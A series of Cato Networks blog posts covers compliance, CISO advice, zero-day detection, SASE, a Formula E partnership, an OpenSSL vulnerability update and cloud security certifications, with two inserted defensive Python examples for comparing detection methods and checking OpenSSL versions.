Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how your organization can manage its cyber risk exposure by signing up for a free demo of Cato SASE Cloud today.
November 24, 2022
Addressing Regulatory Compliance Challenges for the Distributed Enterprise
Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the inability to perform business-critical activities, such as processing payment card data.
Digital transformation and the evolution of the regulatory landscape can pose significant compliance challenges for organizations. In most cases, the legacy security technologies designed for primarily on-prem, castle-and-moat security models are no longer enough for security. Maintaining regulatory compliance in the face of digital transformation requires security solutions designed for modern IT environments.
Companies Face Significant Compliance Challenges
Every company is subject to several regulations. Common examples include employer laws, privacy regulations (such as the GDPR), and financial regulations (such as SOX). While this has been true for some time, the complexity of achieving and maintaining regulatory compliance has grown significantly in recent years. Two of the major contributors are the changing regulatory landscape and the expansion of corporate IT networks.
An Evolving Regulatory Landscape
Within the last few years, the regulatory landscape has grown increasingly complex. Companies have long been subject to regulations such as the Payment Card Industry Data Security Standard (PCI DSS), which protects the data of payment card holders, and the Health Insurance Portability and Accountability Act (HIPAA), a US regulation for protected health information (PHI).
However, the enactment of the General Data Protection Regulation (GDPR) within the EU has set off a surge in new data privacy laws. The GDPR defined many new rights for data subjects, and laws based upon it, such as the California Consumer Privacy Act (CCPA) and its update the California Privacy Rights Act (CPRA), implement these and other rights to varying degrees.
The patchwork of new regulations makes it more difficult for companies to achieve, maintain, and demonstrate compliance. At the same time, existing regulations, such as PCI DSS, are undergoing updates to keep up with evolving data security threats and IT infrastructure.
The Increasingly Distributed Enterprise
Regulatory compliance has also been complicated by the growing distribution of the modern enterprise. The move to cloud computing means that companies may not know where their sensitive data — potentially covered under various regulations — is being stored and processed. The growth of remote work means that employees may be downloading and processing user records in jurisdictions with different data privacy laws.
Some regulations, such as the GDPR, prohibit the transfer of constituents’ data outside of countries with “adequate” data privacy laws, a requirement that might be violated by the use of cloud computing and support for remote work. Companies may also struggle to ensure that mandatory security controls are in place for data stored on devices and infrastructure outside of their control.
It is much harder to maintain compliance with digital transformations: data is all over the place (or the world) and so are users. The way to overcome this is to use a solution that ensures that the organization has global network visibility and the ability to enforce corporate policy across its entire IT infrastructure.
Legacy Remote Access Technology No Longer Works
Historically, companies have implemented a perimeter-focused security model. Initially, this ensured that traffic moving between the corporate network and the public Internet was inspected and secured. As companies expanded to the cloud and remote work, network traffic between remote sites was backhauled to a central location for inspection and enforcement before being routed to its destination.
Correctly implemented, this model may give an organization the visibility and control that it requires for compliance. However, it does so at the cost of network performance and scalability. As corporate networks expand, a growing volume of traffic must pass through the central inspection point.
Growing traffic volumes place additional strain on network and security solutions and add to the network latency impacts on cloud-based software and remote users. Additionally, as virtual private networks (VPNs), the solutions used to implement these castle-and-moat designs, lack any built-in access controls or security capabilities, centralized security architectures require multiple standalone solutions, making them complex and expensive to scale to meet demand.
Maintaining Regulatory Compliance Despite Enterprise Expansion
The limitations of VPNs and legacy security architectures have inspired the zero trust security movement. Implementing a zero trust security model at scale requires solutions capable of enforcing access controls across an organization’s entire IT infrastructure without sacrificing network performance or visibility.
The right way to accomplish this is with a zero trust architecture that is cloud-native and globally available. Cloud-native security solutions can acquire additional resources as needed, allowing them to scale with the business and growing traffic volumes. Additionally, cloud-native security services are available everywhere that an organization’s users and data are, decreasing the performance impacts of regulatory compliance and security.
With the right zero trust architecture, there is no need to compromise or balance between business growth and regulatory compliance. Strong, scalable security meets regulatory requirements, and global visibility and automated data collection and report generation simplify regulatory compliance. Security Service Edge (SSE) and Secure Access Service Edge (SASE) provide the zero trust security architecture that enterprises need to achieve regulatory compliance. By converging networking and network security functionality into a cloud-native solution, SASE moves security tools needed for dynamic regulatory compliance to the cloud.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about simplifying network security and regulatory compliance with Cato SASE Cloud by signing up for a free demo today.
November 21, 2022
How to Become a Successful CISO: Advice from Amit Spitzer, Cato Networks’ CISO
Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements.
After more than 15 years in security and IT, I can honestly recommend the CISO position to security or IT professionals who are looking for a demanding, yet satisfying, position. Whether you’re implementing a new technology that will help mitigate zero-day attacks or consulting the board about the security impact of an M&A, there’s rarely a dull moment in the life of a CISO. In this post, I have put together my top tips for being a successful and effective CISO, based on my own experience. I hope you find it helpful on your own career path. For a tactical and hands-on guide to becoming CISO, take a look at our blog post, “The 5-Step Action Plan to Becoming CISO”.
Before You Begin: Why Do You Want to Become a CISO?
The first step to becoming a CISO is getting clear on why you want to become one. Whether you’re planning to be a CISO at a disruptive technological company or a paper manufacturing facility, the underlying role and responsibilities of the CISO are ultimately the same: protecting the organization from bad actors who are trying to get their hands on sensitive data. If reading this description got your heart beating faster, then security is the right domain for you. Within security, the difference between a C-level security professional (a CISO) and other security professionals is the vision. A CISO envisions how she or he will impact the company’s goals and milestones, contribute to the company’s interests and protect its assets. While this keeps many a CISO up at night, it is also exciting and exhilarating, since you are involved in major company milestones, like IPOs. Are you ready to actively participate in these types of business activities? If the answer is ‘yes’, you’re in the right CISO mindset.
Starting Your CISO Journey: Taking a Hands-On Approach
In the past, CISOs from legacy enterprises focused on building the organization. This first generation of CISOs was not involved in technologies. Instead, they set the stage for today’s CISOs, who are in the trenches and taking a hands-on technical approach, while also contributing to business-related goals, like their predecessors.
Such deep technological experience is gained by building yourself from the bottom-up. While a CISO is a C-level position, a good CISO will still be passionate about learning and understanding technologies. This means learning all the specifics of threats and risks and how to mitigate them. You know you’ve succeeded when you’re able to swap out all members of your team.
At the same time, a good CISO also needs to be involved in business aspects like growth, revenue, quarterly sales, etc.
Maintaining the Balancing Act Between Security and Functionality
The built-in challenge between Security and Business departments revolves around how to ensure an apt layer of security while maintaining business operational agility. Let’s face it, there is no ideal solution or global truth for answering this challenge. If the pendulum swings too far in one direction, either business or security, the risks will be too high or the business won’t be able to function, and the board might as well close the company.
In the past, the “block everything” approach was commonly implemented by companies. First generation CISOs piled up security solutions that blocked any technology or traffic that could potentially be a risk. But in a fast-growing startup that needs to be agile, this approach could quickly become the kiss of death to the business.
Instead, it is best to understand that there is no security without sales and there are no sales without security. A CISO and the security teams are here to serve the business and be growth enablers. This means understanding that every security decision made can impact the company and its development processes and therefore needs to be taken carefully.
When making decisions, I recommend building a decision tree that displays various routes of decision-making and their business outcome. Let’s think of an extreme example. If a CISO needs to determine whether or not to approve Zoom, some of the negative business outcomes of prohibiting Zoom could be:
Impacting internal communication
Hindering communication with external entities: customers, vendors, partners, etc.
Spending more IT resources on finding and procuring a different communication solution
Taking up employee resources for implementing and training on the new communication solution
On the other hand, the responsibility for understanding the risks of new technologies and tools is the CISO’s domain. When implementing a solution, don’t settle on visibility through advanced monitoring capabilities. You and your team need to be able to track incidents and mitigate them before they become breaches with a significant blast radius.
Goal-setting, Roadmap Creation and KPI Planning
A CISO’s goals and KPIs are derived from their main mission: protecting the organization from threat actors who are attempting to access the company’s assets. This means different things in different organizations, which makes it hard to create a global benchmark for CISOs.
For example, a KPI in one company could be to reduce the percentage of clicks on phishing emails from 5% to 3%. But in another, phishing emails are not a prominent attack vector, so such a KPI would not be considered a high priority.
I recommend you build and approve your CISO goals, roadmap and KPIs with your leadership team and board. This serves two purposes. First, ensuring that these metrics are aligned with business needs. Second, evangelizing the CISO’s role and responsibilities, and therefore creating a higher chance for you to succeed.
Tips for Getting Hired as a First-time CISO
Finding a first-time CISO role can take some time. Here’s how to make yourself stand out with recruiters and CEOs who are reviewing your CV, comparing you to other applicants or considering you for a first-time role:
Become an expert - Specialize in a security or organizational aspect and make yourself the go-to person for that field. This could be a certain application or how a practice is implemented in an organization. This becomes a strong driver for organizations to hire you and want to include you in their organization.
Build confidence in your abilities - Create a sense of trust in your abilities to handle various situations, in your technological capabilities and of your business acumen. By doing so, you will be the person who is handed opportunities when they arise.
Combine technology and business capabilities - Build up your business experience by taking a business-oriented approach. Don’t be afraid to hop on customer calls, answer customer questions and participate in cross-departmental brainstorming sessions where commercial questions are discussed. You can also become involved with marketing and sales processes to help them streamline their processes.
Take projects from idea to execution - Find an idea that can help the business and bring it to execution. This includes research, building rapport with colleagues, resource allocation and project management. Comprehensive project management will not only show off your leadership skills, it will also help you hone your combination of technological and business capabilities, to help you build yourself up for the role.
Next Steps for Future CISOs of Tomorrow
Your CISO journey might not be the same as your colleagues’, or it might be a textbook career path from security professional to CISO. Either way, your unique characteristics as a CISO are what will make you stand out, not how you got there. By being enthusiastic about what you do, finding creative ways to solve problems and constantly maintaining an understanding of tech and business growth, you will be able to lead security and make the best decisions for your company, which is the real indicator of success.
November 17, 2022
The 3 Worst Breaches of 2022 That You Should Know About (That Didn’t Get Much Press or Attention)
As security professionals, we are inundated with news stories and articles about cyber attacks and breached companies. Sometimes, attacks become newsworthy because of the attacked company, for example when it's a notable enterprise. Other times, the attack technique was so unique, that it deserves a headline of its own.
In this blog post, we take a different approach. Instead of naming and shaming, we will review three of the worst breaches and attacker tactics and techniques of 2022 that might have gone by unnoticed, and use them as a way to learn how to better protect ourselves.
This blog post is based on episode #9 of the Cato Networks cybersecurity Master Class (“The 3 Worst Breaches of 2022 That You Probably Haven’t Heard Of”). The Master Class is taught by Etay Maor, Sr. Director of Security Strategy at Cato Networks and an industry recognized cyber security researcher and keynote speaker. You can watch all the episodes of the Master Class, here.
Attack #1: Ransomware: The Sequel
Ransomware as a service is a type of attack in which the ransomware software and infrastructure are leased out to the attackers. In this first case, the threat actors used ransomware as a service to breach the victim’s network. They were able to exploit third-party credentials to gain initial access, progress laterally and ransom the company, all within mere minutes. The swiftness of this attack is unusual. In many cases, attackers stay in the networks for weeks and months before demanding the ransom.
So, how did attackers manage to ransom a company in minutes, with no need for discovery and weeks of lateral movement?
Watch the Master Class to learn more about the history of ransomware, ransomware negotiation and various types of ransomware attacks.
Attack #2: Critical Infrastructure: Sabotaging Radiation Alert Networks
Attacks on critical infrastructure are becoming more common and more dangerous. Breaches of water supply plants, sewage systems and other such infrastructures could put millions of residents at risk of a human crisis. These infrastructures are also becoming more vulnerable, with tools like Shodan and Censys that enable finding vulnerabilities fairly easily.
Let Etay Maor take you on a deep dive into ICS (Industrial Control Systems). Why are attacks moving from IT to OT (Operational Technology)? And, in the Master Class, we discuss security solutions for protecting critical infrastructure, like zero trust and SASE.
Attack #3: Ransomware (That Could Have Been Prevented)
The third attack is also a ransomware attack. This time, it consisted of a three-step approach of infiltration, lateral progression over the network, and exfiltration. You’ll learn the ins and outs of this attack, including who the victim is and why their point security solutions were not able to block this attack.
Etay Maor conducts a full breach analysis, taking us from a “single-point-of-failure” mindset to a holistic and contextual approach that requires securing multiple choke points.
To learn more about each of these three attacks, what to expect in 2022-2023 and how a converged security solution can assist in preventing similar attacks in the future, watch the Master Class.
November 14, 2022
Effective Zero-Day Threat Management Requires Cloud-Based Security
Zero-day attacks are a growing threat to corporate cybersecurity. Instead of reusing existing malware and attack campaigns that are easily detected by legacy security solutions, cyber threat actors tune their malware to each campaign or even each target within an organization.
These zero-day attacks are more difficult and expensive to detect, creating strain on corporate security architectures. This is especially true as the growth of corporate IT infrastructures generates increasing volumes of network traffic that must be inspected and secured. Managing cyber risk to corporate IT systems requires security solutions that can scale to meet growing demand.
Zero-Day Threats Are Harder to Detect
Historically, antivirus and other threat detection technologies used signature-based detection to identify malware and other malicious content. After a new threat was identified, a signature was built based on its unique features and added to the signature library. All future content would be compared to this signature, and, if it matched, would be identified as a threat and remediated.
This approach to threat detection requires limited resources and can be highly effective at identifying known threats. However, a signature must first exist for threats to be identified. The growth of zero-day attacks leaves signature-based detection blind to many threats and creates a delay between the emergence of a new threat and solutions’ ability to identify it.
Other approaches to threat detection can identify novel and zero-day threats. For example, anomaly detection identifies deviations from normal behavior that could point to either benign errors or attempted attacks. Behavioral analysis monitors the actions of user accounts, applications, and devices for risky or malicious behaviors that pose a threat to a system.
These forms of threat detection have the ability to provide much more robust protection to an organization’s systems against novel and evolving threats. However, this improved detection comes at a price. In general, anomaly and behavioral detection consume more processing power and require access to larger datasets than traditional, signature-based detection systems. Also, non-signature detection systems have the potential for false positive detections, creating additional alerts for security personnel to sort through.
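The trade-off described above, as an added example that is not from the original post or from any vendor's product: a hash-based signature lookup and a simple z-score anomaly check run over the same four events. All sample contents, the traffic baseline, the event list and the function names are constructed for illustration.

```python
import hashlib
import statistics

# Constructed stand-ins for file contents (not real malware). The second
# sample represents the same tool rebuilt for a new target, so its bytes differ.
KNOWN_SAMPLE = b"constructed-dropper-build-0001"
TUNED_SAMPLE = b"constructed-dropper-build-0002"
BENIGN_FILE = b"constructed-backup-agent"

# Signature library: hashes of content that has already been seen and analysed.
SIGNATURES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}

# Constructed baseline: outbound MB per hour previously observed for one host.
BASELINE_MB = [42, 38, 45, 40, 39, 44, 41, 43, 37, 41]

# Constructed events: (name, file content, outbound MB that hour, is_malicious)
EVENTS = [
    ("known malware", KNOWN_SAMPLE, 900, True),
    ("tuned variant", TUNED_SAMPLE, 900, True),
    ("nightly backup", BENIGN_FILE, 650, False),
    ("normal browsing", BENIGN_FILE, 43, False),
]


def signature_match(content):
    """Cheap check: one hash and one set lookup, but only for known content."""
    return hashlib.sha256(content).hexdigest() in SIGNATURES


def z_score(value, history):
    """Distance from the baseline mean in standard deviations (needs history)."""
    return (value - statistics.mean(history)) / statistics.stdev(history)


def anomaly_match(outbound_mb, history=BASELINE_MB, threshold=3.0):
    """Flag any hour whose traffic deviates strongly from the host's baseline."""
    return abs(z_score(outbound_mb, history)) > threshold


def score(results):
    """Count outcomes for an iterable of (flagged, is_malicious) pairs."""
    counts = {"detected": 0, "missed": 0, "false_positive": 0}
    for flagged, malicious in results:
        if flagged and malicious:
            counts["detected"] += 1
        elif malicious:
            counts["missed"] += 1
        elif flagged:
            counts["false_positive"] += 1
    return counts


def compare(events=EVENTS):
    """Run both detectors over the same events and return their outcome counts."""
    sig = score((signature_match(content), bad) for _, content, _, bad in events)
    ano = score((anomaly_match(mb), bad) for _, _, mb, bad in events)
    return {"signature": sig, "anomaly": ano}


if __name__ == "__main__":
    for detector, counts in compare().items():
        print(detector, counts)
```

The signature detector misses the rebuilt sample because its hash is new, while the anomaly detector catches both malicious events and also raises an alert on the benign backup job that an analyst has to triage.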
Legacy Firewall Security Solutions Can’t Keep Up
Zero-day threat detection is essential for protecting against modern cyber threats, but it is also resource-intensive. As traffic volumes increase, the additional work required to identify novel threats can put strain on an organization’s network security architecture.
This is especially true for organizations that rely on legacy next-generation firewalls (NGFWs). Firewall security solutions deployed within an organization’s on-prem data center have limited scalability. If traffic volumes exceed the compute capabilities of an appliance-based solution or software running on a server, then the organization needs to acquire and deploy additional hardware to secure the traffic without compromising network performance. This is especially true if TLS decryption is required for inspection of encrypted traffic as this can exhaust an appliance’s compute capacity.
As the cyber threat landscape evolves, organizations will need to identify and respond to more numerous and sophisticated cyber threats, which increases the resource requirements of cyber threat detection. With legacy, appliance-based solutions deployed on-prem, companies are already forced to choose between properly protecting their environments against cyber threats and the performance of their corporate networks.
Cloud-based Security is Essential for Modern Threat Management
One of the main limitations of security solutions is that effectively inspecting and securing network traffic is computationally expensive. With limited resources, TLS decryption and in-depth inspection of network traffic can cause performance issues, especially as corporate networks and their traffic bandwidth increase.
The best way for companies to keep pace with the growing resource requirements of security is to take advantage of cloud scalability and adaptability. Cloud-native security solutions can expand the resources that they consume as needed to cope with growing network traffic volumes and the associated cost of security inspection and threat detection and response.
Secure Access Service Edge (SASE) solutions take full advantage of the benefits of the cloud to optimize corporate network security. SASE solutions converge many network and security functions into a single solution, eliminating the redundancy and waste of standalone solutions. Additionally, as cloud-native solutions, SASE solutions elastically scale to meet growing network traffic volumes or the resource requirements of expensive security operations.
In addition to solving the problem of the resource consumption of security functions, SASE solutions also provide numerous other benefits, including:
Greater Visibility: SASE solutions integrate traffic inspection and threat detection across the entire corporate WAN and not only the internet. This provides improved security visibility and additional context regarding cyber threats.
Improved Threat Detection: SASE solutions can also leverage this increased visibility — as well as threat intelligence data — to more accurately identify threats to the organization. Security integration also means that threat response activities can be coordinated across the corporate WAN, providing better protection against distributed attacks.
Enhanced Network Performance: SASE solutions are globally distributed and integrate network optimization functions as well as security features. Traffic can be inspected and secured at the nearest SASE point of presence before being optimally routed to its destination.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud’s threat detection capabilities can help protect your organization against zero-day threats with a free demo.
November 10, 2022
SASE Vendor Selection: Should You Focus on Outcomes or Tools?
Ever since the 1990s, IT has been dominated by appliance-centric architecture. But in 2015, Cato revolutionized this paradigm by envisioning networking and security delivered as a converged, cloud-native service. This evolution was not unlike the massive shift created by AWS’s global cloud service, which provided a new kind of infrastructure that supported scalability, resiliency, elasticity, security, connectivity and global distribution (and more).
While AWS is not necessarily the cheapest option, businesses today still choose AWS (or Azure, Google Cloud and other public cloud providers) so they can focus their IT teams on business critical projects and strategic initiatives, instead of requiring them to maintain and manage infrastructure. In other words, AWS became an extension of the IT team, turning it into a business enabler.
Cato is following a similar path. The Cato SASE Cloud provides high-performance routing and security inspection of enterprise network traffic. To ensure high availability and maximal security posture, the Cato SASE Cloud is optimized and maintained by our professionals from DevOps, networking and security. As a result, Cato too is an extension of the IT team, while owning the outcome: a secure and resilient infrastructure. This blog post compares Cato SASE to legacy applications while demonstrating the strategic business value of Cato. A more in-depth comparison can be found in the whitepaper on which this blog post is based.
Cato SASE Cloud vs. Legacy Appliances
How is the value of Cato justified? While legacy appliances are tools, Cato SASE Cloud is built for outcomes: highly available, scalable and secure connectivity for everyone, everywhere.
Disruption-free capacity handling
No infrastructure maintenance
24x7 NOC
24x7 SOC
24x7 Support
Tools on the other hand create:
Complexity when deploying and planning capacity
A capacity vs. usage tradeoff
Difficulties maintaining the security posture
An extended attack surface of appliances
Limited support effectiveness and limited customer environment access
Cloud-Delivered vs. Appliance-Delivered Features
Features differ in their deployment, management, scalability, and effectiveness. Let’s look at some examples of these differences through the lens of managed vs. standalone features and adaptable vs. rigid features.
Managed vs. Standalone Features
Managed - Cato’s IPS is always in a fully optimized security posture. We evaluate threats and vulnerabilities, develop mitigations and deploy only after ensuring performance isn’t negatively impacted.
Standalone - An IPS from an appliance vendor requires the IT team to deploy, assess the deployment impact on performance and ensure all appliances are kept up-to-date. Consequently, these teams are in “detect mode” instead of “prevent mode”.
Adaptable vs. Rigid Features
Adaptable - Cato’s cloud-native architectures make inspection capabilities available whenever there are new loads or new requirements, at any scale or location, and seamlessly.
Standalone - When locations and capacity are constrained, it’s the customer’s responsibility to predict future inspection capabilities. As a result, new branches, users and applications turn into business disruptors, instead of driving growth.
“DIY” is a good solution in some cases, but not for enterprises looking to achieve agile and flexible networking and security infrastructure. The required infrastructure expertise coupled with the lack of IT resources make DIY unsustainable in the long haul. Instead, a new partnership model with technology-as-a-service providers is required. This partnership can help organizations achieve the outcomes they need to drive their business and achieve their strategic goals.
Read more from the whitepaper “The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes”, for a closer look.
Driving Into Action: Our New Partnership with the TAG Heuer Porsche Formula E Team
In the new digital world, we’re no longer restricted by borders and can innovate with our colleagues and partners all over the world. ABB FIA Formula E World Championship has been growing year-on-year and has become the testing ground for the latest innovations not only for Motorsport, but the automotive industry as a whole. So, I am thrilled to announce that today we are launching a partnership with the TAG Heuer Porsche Formula E Team as its official SASE partner.
Porsche has a rich racing history dating back to the 1950s. In Formula E’s sixth season, Porsche made its long-awaited return to top-flight single-seater racing and has continued to make positive strides over the past three years. Last season saw the team secure their first race win in Formula E with an impressive 1-2 finish in Mexico City.
At Cato, we pride ourselves on helping our customers collaborate securely from anywhere on the globe by eliminating the complexities of point solutions and delivering secure network architecture through the power of a single-vendor SASE cloud platform. Global motorsport competitions are often labeled as traveling circuses, as they assemble, race, pack up, and move on to the next country on a weekly and monthly basis. The nature of the Formula E racing season, along with the team’s extensive use of technologies and data, has meant that cloud-native networking and security infrastructure have become a cornerstone of the team’s strategy.
The decisions that the TAG Heuer Porsche team makes are comparable to those of any business organization. When you need to analyze every data point from tire temperatures to battery depletion in real-time and the team’s HQ is located on the other side of the world, it’s vital the team can make split second decisions to make a difference on track.
These decisions are informed by vast datasets that the team has collected throughout each Formula E event and the car’s extensive development. These data-informed insights are critical for the team’s on-track performance and must be handled in a way that minimizes security and operational risks while providing optimal application and data access.
Cato will play an important role helping the TAG Heuer Porsche Formula E team to optimize operations and provide secure access to the network and SaaS applications all season long. We are excited and optimistic about the season and working together to… WIN!
“Join us by supporting the TAG Heuer Porsche Formula E Team when Formula E Season 9 kicks off in Mexico City on January 14th and stay tuned for more details on the partnership in the coming weeks.”
Find out more about the TAG Heuer Porsche Formula E team here: https://motorsports.porsche.com/international/en/category/formulae
The OpenSSL Vulnerability: A Cato Networks Labs Update
The new high-severity vulnerabilities in OpenSSL, CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service), were disclosed this week.
What is OpenSSL?
OpenSSL is a popular open-source cryptography library that enables secured communications over the Internet in part through the generation of public/private keys and use of SSL and TLS protocols.
What Are the Vulnerabilities?
The vulnerabilities were found in OpenSSL versions 3.0.0 to 3.0.6. They occur after certificate verification, and then only after unlikely conditions are met: either a certificate authority (CA) has signed a malicious certificate, or an application continues verifying a certificate despite failing to identify a trusted issuer.
With CVE-2022-3602, a buffer overrun can be triggered in X.509 certificate verification, enabling an attacker to craft a malicious email address to overflow four attacker-controlled bytes on the stack, which could result in a crash, causing a Denial of Service (DoS), or remote code execution (RCE). With CVE-2022-3786, a buffer overrun can also be triggered in X.509 certificate verification, but specifically in name constraint checking. Again, the attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the “.” character (decimal 46) on the stack, resulting in a crash causing a DoS. (Read the OpenSSL Security Advisory here for detailed information about the attacks.)
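One way to check an inventory against the affected range stated above (OpenSSL 3.0.0 to 3.0.6), as an added example that is not Cato's or the OpenSSL project's code. The host names and version banners are constructed sample data, and the function names and status labels are assumptions made for this sketch.

```python
import re
import ssl

# Affected range as stated on this page: OpenSSL 3.0.0 through 3.0.6 inclusive.
AFFECTED_MIN = (3, 0, 0)
AFFECTED_MAX = (3, 0, 6)

# Product name followed by a three-part numeric version.
BANNER_RE = re.compile(r"\b(OpenSSL|LibreSSL)\s+(\d+)\.(\d+)\.(\d+)")

# Constructed inventory: component name -> banner as `openssl version` prints it.
INVENTORY = {
    "web-frontend": "OpenSSL 3.0.5 5 Jul 2022 (Library: OpenSSL 3.0.5 5 Jul 2022)",
    "legacy-api": "OpenSSL 1.1.1q  5 Jul 2022",
    "mail-relay": "OpenSSL 3.0.7 1 Nov 2022 (Library: OpenSSL 3.0.6 11 Oct 2022)",
    "bsd-gateway": "LibreSSL 3.0.2",
    "build-agent": "OpenSSL 3.0.13 30 Jan 2024",
    "appliance-x": "unknown",
}


def classify(banner):
    """Return 'affected', 'outside-range', 'other-library' or 'unparsed'."""
    # When the tool reports a separate library version, the loaded library
    # is what performs certificate verification, so prefer that part.
    library_part = banner.split("Library:", 1)[-1]
    match = BANNER_RE.search(library_part)
    if not match:
        return "unparsed"
    if match.group(1) != "OpenSSL":
        # A fork with its own numbering: "3.0.2" here is not OpenSSL 3.0.2.
        return "other-library"
    # Compare as integer tuples so that 3.0.13 is not read as lower than 3.0.6.
    version = tuple(int(part) for part in match.group(2, 3, 4))
    if AFFECTED_MIN <= version <= AFFECTED_MAX:
        return "affected"
    return "outside-range"


def audit(inventory=INVENTORY):
    """Group component names by status so each group can be followed up."""
    groups = {}
    for name, banner in inventory.items():
        groups.setdefault(classify(banner), []).append(name)
    return {status: sorted(names) for status, names in groups.items()}


def local_runtime():
    """Classify the OpenSSL build that this Python interpreter is linked to."""
    return ssl.OPENSSL_VERSION, classify(ssl.OPENSSL_VERSION)


if __name__ == "__main__":
    for status, names in audit().items():
        print(f"{status}: {', '.join(names)}")
    print("this interpreter:", *local_runtime())
```

Components that land in `unparsed` or `other-library` still need a manual look, since the check only speaks to the version range given on this page.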
What’s the Impact on Cato SASE Cloud? None.
While Cato does use OpenSSL, neither vulnerability impacts our infrastructure. Neither our cloud assets, the Cato Socket, nor the Cato Client use a vulnerable version of OpenSSL.
What Actions is Cato Taking?
Cato Networks Research Labs is investigating the unlikely case of exploitation attempts and considering adding new IPS signatures to block them. Currently, we have not seen incidents or published reports of exploitation attempts in the wild.
What Actions Should I Expect from Other Tech Vendors?
The attack is severe enough that all vendors should upgrade affected appliances and software. You can see a list of affected software here. While patching and protecting users at Cato can happen instantly, such as with Log4j, that’s not the case with all solutions. Expect exploits of the OpenSSL vulnerabilities to linger as we saw with Log4j.
Cato Networks Research Labs will continue to monitor the situation and update accordingly.
How To Identify a Trusted Cloud Provider: The Essential Security Certifications and Practices You Should Look For
Although managing on-premises servers may be costly and time-consuming, businesses at least have some control when it comes to patching, say, a newly discovered exploit or stopping a zero-day attack. Not so with the cloud. Cloud-based estates are at the mercy of cloud service providers to apply relevant patches and maintain the security of the infrastructure that they’re using.
That’s why it’s so important for organizations to ensure they’re partnering with trusted cloud providers, who can be relied upon to maintain an appropriate level of safeguarding and discipline when it comes to their security. And one of the most important ways they can establish the trustworthiness of a vendor is by seeking out those who have obtained relevant certifications.
SOC 1 and 2: Ever Popular and Important
There are several key accreditations that IT vendors and service providers can attain in order to demonstrate their competency in various areas, such as data privacy or information security.
Among the certifications customers most frequently request when conducting due diligence are the SOC 1 and SOC 2 Type 2 standards established by the American Institute of CPAs (AICPA).
SOC 1 helps organizations examine and report on their internal controls relevant to their customers' financial statements. At the same time, SOC 2 focuses on controls relevant to the security, availability, processing integrity, confidentiality, and privacy of customers' data. Cato is annually audited by a third party to ensure procedures and practices are followed and never neglected.
The ISO Family Is Well Known for Good Reason
The ISO27000 family of certifications is among the most popular and well-known. These certifications are independently verified and internationally recognised and are often regularly updated to reflect current best practices. When comparing cloud providers, IT leaders should look for those that adhere to a variety of well-known industry standards relevant to their business globally. Another recommendation is to focus not only on general security certifications, but also on cloud security and privacy protection as they become a prerequisite for doing business.
Cato Networks, for example, holds many certifications within this family, such as ISO27001, which sets out the specification for an information security management system (ISMS). This includes policies, goals and objectives, statement of applicability (SOA), roles and responsibilities (R&R), risk assessment, and treatment methods. This is one of the most well-known and requested certifications internationally, creating a “security first” approach in the organizational culture.
Achieving ISO27001 certification is often the first step on a vendor’s journey and is a prerequisite for earning further related accreditations. ISO27017 – also held by Cato – is one of the security standard’s extensions for cloud service providers, and addresses access control, cryptography, physical and environmental security, information lifecycle management, and other controls in the cloud. ISO27017 can help win new business as many organizations now worry about cloud security and want to ensure their assets are protected wherever they are stored or processed.
ISO27701 and ISO27018, meanwhile, are data privacy extensions that demonstrate that Cato has met the guidelines for implementing measures to protect Personally Identifiable Information (PII). ISO27701 focuses on establishing, implementing, and maintaining a privacy information management system (PIMS) and managing privacy risks related to PII, and it helps organizations comply with GDPR and other data protection regulations. ISO27018 focuses on PII protection in the cloud and offers guidance on implementing privacy by design.
In order to achieve ISO27701 and ISO27018 extensions, organizations like Cato must follow the most comprehensive data controls delivered by an internationally recognized standard, which makes it easier for Cato and its solutions to provide assurances about their security and data protection practices. Cloud vendors should be constantly updating and adding to the library of certifications that they’ve achieved in order to demonstrate a deepening of their skills, and a continued commitment to their customers’ safety.
These certifications – as well as the many others held by reputable cloud providers such as Cato – are useful in proving a firm commitment to high standards of security and privacy. They can also play a valuable role in ensuring compliance with key regulatory frameworks, including the European GDPR, and the California Consumer Privacy Act – which is vital for supporting clients who are bound by these laws.
What to Consider Beyond Certifications
Certifications only tell part of the security story, however. In addition to accreditations, the actions of a company, as well as its attitudes and approaches to compliance, can also indicate whether a provider is serious about security. Along with recognizing the need for certification, and the important role that compliance plays in the business, organizations must continually evolve in their implementation, maintenance, and monitoring of compliance issues. This is why Cato is constantly investing in new capabilities, tools, and approaches which are needed to demonstrate accurate, deep, and real-time compliance with the security and privacy standards it adheres to.
For instance, while more traditional development life cycles place security and compliance testing as one of the final stages a solution would go through prior to deployment, Cato follows the ‘Shift Left’ approach. This concept, first popularised within the DevOps community, involves injecting processes such as testing and security into an earlier phase of project development, in order to identify potential problems more quickly and easily.
Another tactic borrowed from the world of DevOps is the adoption of data-driven decision-making. Instead of relying on data reflecting a specific point in time to conduct compliance audits, real-time data from live systems now allows for continuous monitoring and comparison with security standards. This provides a much more in-depth picture of compliance posture, as opposed to the high-level gaps revealed by more static methodologies.
In-depth, accurate data is also used much more heavily in risk models, which are now created using quantitative rather than qualitative analysis. This gives much better visibility of genuine risk factors and their potential impact, without relying on subjective perceptions. This reflects the broader change in attitudes towards compliance across the industry; where previously compliance tasks would have been handled by technical personnel and consultants, organizations will now often have entire teams dedicated to compliance, including representatives from GRC departments and the DPO’s office, which maintain ownership of related issues on a continuous basis.
Certifications are Essential for Building a Trusted Relationship
